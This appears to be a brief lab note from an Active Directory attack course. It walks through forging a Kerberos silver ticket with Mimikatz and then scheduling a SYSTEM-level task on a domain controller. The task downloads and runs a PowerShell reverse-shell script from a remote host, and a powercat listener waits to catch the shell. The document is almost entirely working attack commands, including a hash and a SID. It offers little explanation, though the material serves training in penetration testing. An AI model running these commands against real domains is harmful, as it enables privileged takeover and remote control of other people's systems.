Create Silver Ticket

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:731a06658bc10b59d71f5176e93e5710 /user:Administrator/ptt"'

Creating Task

schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\\SYSTEM" /TN "Student648" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''<http://172.16.100.X/Invoke-PowerShellTcp.ps1>''')'"

Running The Task

schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "Student648"

Setting Up Listener

powercat -l -p 4444 -v -t 1024

Resources

Kerberos: Silver Tickets

Kerberos Attack: Silver Ticket Edition